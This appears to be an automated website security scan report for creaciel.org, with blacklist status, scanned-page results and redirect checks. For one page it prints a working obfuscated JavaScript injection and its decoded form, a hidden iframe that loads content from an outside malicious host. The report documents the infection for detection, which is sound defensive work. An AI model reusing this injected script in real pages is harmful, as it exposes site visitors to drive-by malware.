Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=creaciel.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://creaciel.org/ | HTTP/1.1 200 OK Connection: close Date: Sat, 27 Dec 2014 18:50:40 GMT Accept-Ranges: bytes Server: Apache Vary: Accept-Encoding Content-Length: 106 Content-Type: text/html Set-Cookie: xxlplanBAK=R3174115850; path=/; expires=Sat, 27-Dec-2014 19:53:53 GMT Set-Cookie: xxlplan=R1719491035; path=/; expires=Sat, 27-Dec-2014 19:53:53 GMT | clean |
http://creaciel.org/memo/index.html | 200 OK Content-Length: 4519 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) e = '0x00' + '7A';str1 = "%C1%99%92%8F%E5%88%89%82%91%9E%C6%DB%8F%92%88%92%9B%92%91%92%89%82%C3%9D%92%99%99%9E%97%DB%C7%C1%92%9F%8B%9A%96%9E%E5%88%8B%98%C6%DB%9D%89%89%95%C3%D4%D4%90%94%97%92%98%97%89%D7%98%94%96%D4%91%99%D4%96%9E%97%89%D4%DB%E5%8C%92%99%89%9D%C6%CA%E5%9D%9E%92%9C%9D%89%C6%CA%C7%C1%D4%92%9F%8B%9A%96%9E%C7%C1%D4%99%92%8F%C7";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str); Decoded script: <div style="visibility:hidden"><iframe src="http://konicnt.com/ld/ment/" width=1 height=1></iframe></div> Antivirus reports:
| ||
http://creaciel.org/memo/quota.cgi | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://creaciel.org/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://creaciel.org/quota.cgi | 404 Not Found Content-Length: 207 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: creaciel.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 27 Dec 2014 18:50:40 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 106
Content-Type: text/html
Set-Cookie: xxlplanBAK=R3174115850; path=/; expires=Sat, 27-Dec-2014 19:53:53 GMT
Set-Cookie: xxlplan=R1719491035; path=/; expires=Sat, 27-Dec-2014 19:53:53 GMT
...106 bytes of data.
GET / HTTP/1.1
Host: creaciel.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 27 Dec 2014 18:50:40 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 106
Content-Type: text/html
Set-Cookie: xxlplanBAK=R3174115850; path=/; expires=Sat, 27-Dec-2014 19:53:53 GMT
Set-Cookie: xxlplan=R1719491035; path=/; expires=Sat, 27-Dec-2014 19:53:53 GMT
...106 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: creaciel.org
Referer: http://www.google.com/search?q=creaciel.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: creaciel.org
Referer: http://www.google.com/search?q=creaciel.org
Result:
The result is similar to the first query. There are no suspicious redirects found.